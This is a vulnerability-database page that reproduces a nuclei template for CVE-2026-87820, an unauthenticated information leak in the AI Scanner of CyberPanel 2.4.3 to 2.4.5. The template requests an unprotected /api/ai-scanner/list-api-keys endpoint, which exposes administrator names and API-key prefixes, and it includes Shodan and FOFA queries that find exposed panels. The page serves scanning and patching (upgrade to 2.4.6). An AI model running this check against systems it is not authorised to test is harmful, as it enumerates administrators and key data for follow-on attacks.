Lucene search
+L

CyberPanel 2.4.3-2.4.5 - AI Scanner Debug Disclosure

🗓️ 11 Sep 2026 05:22:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Unauthenticated debug disclosure in CyberPanel 2.4.3-2.4.5 AI Scanner leaks admin and scan data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2026-87820
10 Sep 202606:00
circl
cve
CVE
CVE-2026-87820
9 Sep 202611:21
cve
cvelist
Cvelist
CVE-2026-87820 CyberPanel 2.4.3 through 2.4.5 Information Disclosure via AI Scanner
9 Sep 202611:21
cvelist
euvd
EUVD
EUVD-2026-74846
9 Sep 202611:21
euvd
nvd
NVD
CVE-2026-87820
9 Sep 202612:17
nvd
ptsecurity
Positive Technologies
PT-2026-88958
9 Sep 202600:00
ptsecurity
id: CVE-2026-87820

info:
  name: CyberPanel 2.4.3-2.4.5 - AI Scanner Debug Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    CyberPanel versions 2.4.3 through 2.4.5 expose unauthenticated AI Scanner debugging endpoints that disclose administrator usernames, API-key prefixes, scan identifiers, target domains, and account metadata. Unauthenticated attackers can enumerate panel administrators and recent scanner activity to inventory multi-tenant installations and facilitate follow-on attacks.
  impact: |
    Unauthenticated attackers can enumerate panel administrators, API key prefixes,hosted domains, and scan metadata CyberPanel instances.
  remediation: |
    Upgrade CyberPanel to 2.4.6
  reference:
    - https://github.com/usmannasir/cyberpanel/security/advisories/GHSA-qmwq-9cc8-x6h2
    - https://github.com/usmannasir/cyberpanel/commit/20484fd
    - https://nvd.nist.gov/vuln/detail/CVE-2026-87820
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-489
    cve-id: CVE-2026-87820
    epss-score: 0.00247
    epss-percentile: 0.15951
  metadata:
    verified: true
    max-request: 2
    vendor: cyberpanel
    product: cyberpanel
    shodan-query: http.title:"Login - CyberPanel"
    fofa-query: title="Login - CyberPanel"
  tags: cve,cve2026,cyberpanel,debug,disclosure,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(tolower(body), "cyberpanel", "usmannasir/cyberpanel")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/ai-scanner/list-api-keys HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - 'contains_all(body, "api_key_prefix", "admin", "recent_scans")'
        condition: and
# digest: 4a0a004730450221008102e1304140bd99b8d83081974166b14480a3afad31cb1312db4930a799b38b02201565cf4d56fb8f6ba2eb307da41cd0c61150da99d1bc80f59721c3ccfd267a52:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Sep 2026 04:50Current
CVSS 3.15.3
CVSS 46.9
EPSS0.00247
3